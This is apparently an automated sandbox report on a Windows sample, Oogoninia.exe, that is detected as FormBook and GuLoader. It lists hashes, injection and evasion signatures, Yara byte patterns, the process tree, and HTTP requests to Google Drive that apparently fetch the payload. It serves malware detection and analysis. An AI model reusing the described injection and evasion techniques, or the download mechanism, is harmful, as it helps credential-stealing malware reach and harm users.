Windows Analysis Report
Oogoninia.exe

Overview

General Information

Sample name: Oogoninia.exe
Analysis ID: 1529338
MD5: 18fb2cccaa9ac71624eaceada006e938
SHA1: a25055a3b29ce0ee64d7e20eccced0f72ec737db
SHA256: 9b00715d77438200a4f54fa8f47ac17aab0cc166e95fc6737c2a78021b69a64e
Infos:

Detection

FormBook, GuLoader
Score: 96
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Yara detected GuLoader
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • Oogoninia.exe (PID: 3472 cmdline: "C:\Users\user\Desktop\Oogoninia.exe" MD5: 18FB2CCCAA9AC71624EACEADA006E938)
    • Oogoninia.exe (PID: 9000 cmdline: "C:\Users\user\Desktop\Oogoninia.exe" MD5: 18FB2CCCAA9AC71624EACEADA006E938)
      • RAVCpl64.exe (PID: 6496 cmdline: "C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe" -s MD5: 731FB4B2E5AFBCADAABB80D642E056AC)
        • grpconv.exe (PID: 7408 cmdline: "C:\Windows\SysWOW64\grpconv.exe" MD5: 5A13926732E6D349FD060C072BC7FB74)
          • explorer.exe (PID: 4908 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown |
  • 0x2c040:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1415f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
No Sigma rule has matched
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-08T21:52:07.420667+0200 | 2803270 | 2 | Potentially Bad Traffic | 192.168.11.20 | 49705 | 142.250.80.78 | 443 | TCP

AV Detection

Source: Oogoninia.exe | ReversingLabs: Detection: 39%
Source: Yara match | File source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Oogoninia.exe | Joe Sandbox ML: detected
Source: Oogoninia.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
Source: unknown | HTTPS traffic detected: 142.250.80.78:443 -> 192.168.11.20:49705 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.20:49706 version: TLS 1.2
Source: Oogoninia.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: grpconv.pdb source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: grpconv.pdbGCTL source: Oogoninia.exe, 00000002.00000002.1354974337.0000000002246000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdb source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
        Source: Binary string: wntdll.pdbUGP source: Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: Oogoninia.exe, Oogoninia.exe, 00000002.00000003.1266200701.0000000032185000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.00000000324F0000.00000040.00001000.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1269709171.000000003233F000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000002.1365528846.000000003261D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, grpconv.exe, 00000009.00000002.2900077757.0000000004D5D000.00000040.00001000.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1352249094.00000000048C5000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000003.1355628174.0000000004A7E000.00000004.00000020.00020000.00000000.sdmp, grpconv.exe, 00000009.00000002.2900077757.0000000004C30000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Oogoninia.exe, 00000002.00000001.1095360708.0000000000649000.00000020.00000001.01000000.00000006.sdmp
Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_00405642 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose, 0_2_00405642
Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_004060A4 FindFirstFileA,FindClose, 0_2_004060A4
Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_0040270B FindFirstFileA, 0_2_0040270B
Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4x nop then mov ebx, 00000004h 4_2_04117D06
Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 4x nop then mov ebx, 00000004h 9_2_04B204E1
Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Network traffic | Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49705 -> 142.250.80.78:443
Source: global traffic | HTTP traffic detected:
    GET /uc?export=download&id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Host: drive.google.com
    Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
    GET /download?id=1ebPjn97g6Md1czlcx8nGPFrA4sVz_tMd&export=download HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
    Cache-Control: no-cache
    Host: drive.usercontent.google.com
    Connection: Keep-Alive
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | DNS traffic detected: DNS query: drive.google.com
Source: global traffic | DNS traffic detected: DNS query: drive.usercontent.google.com
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://windows.msn.com:443/shellv2?osLocale=en-US&chosenMarketReason=ImplicitNew
        Source: explorer.exe, 0000000F.00000002.5996841586.0000000011914000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2838101876.0000000011914000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://word.office.com64.exe
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.glamour.com/story/shag-haircut-photos-products
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: Oogoninia.exe, 00000002.00000003.1156475256.0000000002200000.00000004.00000020.00020000.00000000.sdmp, Oogoninia.exe, 00000002.00000003.1156646275.0000000002200000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.instyle.com/hair/shag-haircut-face-shape
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/autos/other/24-used-sports-cars-that-are-notoriously-reliable-yet-crazy-ch
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/channel/source/AZ%20Animals%20US/sr-vid-7etr9q8xun6k6508c3nufaum0de3dqktiq
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/entertainment/news/james-earl-jones-dies-at-93-all-about-his-son-flynn/ar-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/feed
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/foodanddrink/recipes/i-asked-3-farmers-the-best-way-to-cook-zucchini-they-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/health/medical/2-egg-brands-have-been-recalled-due-to-a-serious-salmonella
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/lifestyle/beauty/40-shag-haircuts-to-inspire-your-next-salon-visit/ss-AA1p
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a33k6h
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a3oxnm
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/markets?id=a6qja2
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/personalfinance/18-everyday-household-items-that-are-surprisingly-va
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/a-youtuber-asked-a-group-of-americans-aged-70-to-80-what-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/money/retirement/middle-aged-americans-are-leaving-work-for-months-years-t
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/dick-van-dyke-forever-young/ar-AA1lDpRD
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/crime/tyreek-hill-s-traffic-stop-shows-interactions-with-police-can-b
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/6-things-to-watch-for-when-kamala-harris-debates-donald-trum
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/chris-christie-former-trump-debate-coach-offers-key-pieces-o
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/politics/jd-vance-spreads-outrageous-lie-about-haitian-immigrants/ar-
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/james-earl-jones-s-talents-went-far-far-beyond-his-magnificent-voi
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/us/trump-repeats-false-claims-that-children-are-undergoing-transgende
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/news/world/gaza-authorities-say-deadly-blasts-hit-humanitarian-zone/ar-AA1
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nba/johnny-gaudreau-s-wife-reveals-in-eulogy-she-s-pregnant-expecti
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/sports/nfl/49ers-win-over-jets-ends-with-final-score-that-s-never-been-see
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/travel/news/scientists-finally-solve-mystery-behind-bermuda-triangle-disap
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/tv/news/the-bold-the-beautiful-young-and-the-restless-more-get-premiere-da
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/forecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2xhcmEiL
        Source: explorer.exe, 0000000F.00000002.5985329547.0000000009C4D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000F.00000000.2829503548.0000000009C4D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: https://www.msn.com/en-us/weather/hourlyforecast/in-Santa-Clara%2CCalifornia?loc=eyJsIjoiU2FudGEgQ2x
        Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49705 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49706
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49705
        Source: unknown | HTTPS traffic detected: 142.250.80.78:443 -> 192.168.11.20:49705 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 142.251.40.129:443 -> 192.168.11.20:49706 version: TLS 1.2
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 0_2_004050F7 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard

        E-Banking Fraud

        Source: Yara match | File source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

        System Summary

        Source: 00000009.00000002.2899878533.0000000004A20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000002.00000002.1365396637.00000000321D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: 00000009.00000002.2899793805.00000000049D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325634E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562BC0 NtQueryInformationToken,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562EB0 NtProtectVirtualMemory,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32564260 NtSetContextThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32564570 NtSuspendThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562A10 NtWriteFile
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562AC0 NtEnumerateValueKey
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562A80 NtClose
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562AA0 NtQueryInformationFile
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562B10 NtAllocateVirtualMemory
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562B00 NtQueryValueKey
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562B20 NtQueryInformationProcess
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562BE0 NtQueryVirtualMemory
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562B80 NtCreateKey
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325638D0 NtGetContextThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325629D0 NtWaitForSingleObject
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_325629F0 NtReadFile
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562E50 NtCreateSection
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562E00 NtQueueApcThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562ED0 NtResumeThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562EC0 NtQuerySection
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562E80 NtCreateProcessEx
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562F00 NtCreateFile
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562F30 NtOpenDirectoryObject
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562FB0 NtSetValueKey
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562C50 NtUnmapViewOfSection
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562C10 NtOpenProcess
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32563C30 NtOpenProcessToken
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562C30 NtMapViewOfSection
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562C20 NtSetInformationFile
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562CD0 NtEnumerateKey
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562CF0 NtDelayExecution
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32563C90 NtOpenThread
        Source: C:\Users\user\Desktop\Oogoninia.exe | Code function: 2_2_32562D50 NtWriteVirtualMemory
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411B88D SleepEx,NtResumeThread
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe | Code function: 4_2_0411B670 SleepEx,NtCreateSection
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA34E0 NtCreateMutant,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2CF0 NtDelayExecution,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2C30 NtMapViewOfSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2D10 NtQuerySystemInformation,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2E50 NtCreateSection,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2F00 NtCreateFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA29F0 NtReadFile,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2A80 NtClose,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2BC0 NtQueryInformationToken,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2B80 NtCreateKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2B90 NtFreeVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2B00 NtQueryValueKey,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2B10 NtAllocateVirtualMemory,LdrInitializeThunk
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA4570 NtSuspendThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA4260 NtSetContextThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2CD0 NtEnumerateKey
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA3C90 NtOpenThread
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2C50 NtUnmapViewOfSection
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2C10 NtOpenProcess
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2C20 NtSetInformationFile
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA3C30 NtOpenProcessToken
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2DC0 NtAdjustPrivilegesToken
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2DA0 NtReadVirtualMemory
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2D50 NtWriteVirtualMemory
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2EC0 NtQuerySection
        Source: C:\Windows\SysWOW64\grpconv.exe | Code function: 9_2_04CA2ED0 NtResumeThread
